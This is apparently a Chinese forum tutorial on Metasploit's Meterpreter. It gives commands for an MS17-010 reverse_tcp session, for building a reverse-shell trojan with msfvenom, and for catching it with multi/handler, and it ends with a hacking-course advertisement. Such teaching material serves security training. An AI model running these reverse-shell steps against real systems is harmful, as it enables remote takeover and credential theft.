(五)Metasploit扩展模块-Meterpreter

[复制链接]
发表于 2025-11-5 21:52:49 | 显示全部楼层 |阅读模式
一,简介:
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。

Meterpreter shell作为渗透模块有很多有用的功能:
       比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。

如果操作系统存在漏洞,可以直接利用漏洞反弹meterpreter会话:
如: 利用ms17-010漏洞反弹
设置 payload
set payload windows/x64/meterpreter/reverse_tcp
设置被攻击设备IP:
set RHOSTS IP
设置本地接收会话IP:
set LHOST IP
截图202511051352299692.png

如果操作系统存在漏洞,可以直接利用漏洞反弹meterpreter会话:
如: 利用ms17-010漏洞反弹
发起攻击获得meterprenter会话:
截图202511051355581602.png


如果操作系统不存在漏洞,可以上传反弹会话的木马
1. 利用kali生成反弹shell的执行程序:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(kali--ip)  LPORT=(kali接口shell的端口) -f exe -o met.exe
截图202511051356343483.png

2. 在kali上利用metasploit中的exploit/multi/handler进行攻击:
接收反弹的会话    注意IP地址和端口要跟生成的木马地址端口相同
截图202511051357476789.png

3. 上传met.exe程序到web服务器,并且执行该程序, 会话上线
截图202511051357596191.png




必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:17 , Processed in 0.085544 second(s), 27 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表